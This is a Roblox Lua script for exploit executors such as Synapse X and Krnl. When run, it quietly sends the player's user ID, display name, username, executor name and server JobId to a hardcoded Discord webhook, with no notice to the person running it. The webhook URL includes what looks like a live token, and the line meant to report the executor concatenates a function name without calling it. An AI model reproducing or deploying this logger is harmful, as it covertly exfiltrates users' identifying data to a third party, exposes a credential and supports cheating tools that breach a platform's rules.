local ExecutorUsing = is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or secure_load and "Sentinel" or KRNL_LOADED and "Krnl" or SONA_LOADED and "Sona" or "Shit ASS EXPLOIT"
local HttpService = game:GetService("HttpService")
local Data =
    {
        ["embeds"]= {
            {            
                ["title"]= "Click here to view players profile";
                ["url"]= "https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId;
                ["description"]= "```Display: "..game.Players.LocalPlayer.DisplayName.." | User: "..game.Players.LocalPlayer.Name.."```";
                ["color"]= tonumber(0x7269da);
                
                ["fields"]= {
                    {
                        ["name"]= "Executor",
                        ["value"]= "```"..identifyexecutor.."```",
                        ["inline"]= true
                    },
                    {
                        ["name"]= "JobId",
                        ["value"]= "```"..game.JobId.."```",
                        ["inline"]= true
                    },
                }              
            }
        }
}
local Headers = {["Content-Type"]="application/json"}
local Encoded = HttpService:JSONEncode(Data)

Request = http_request or request or HttpPost or syn.request
local Final = {Url = "https://discord.com/api/webhooks/988818279680311366/I5Zz1sZPJx5sn4bucAOWNpIvJXfBVIVCkqZhbOG41zhEtiMmSNWl54w8mYAZqzFFH_e6", Body = Encoded, Method = "POST", Headers = Headers}
Request(Final)
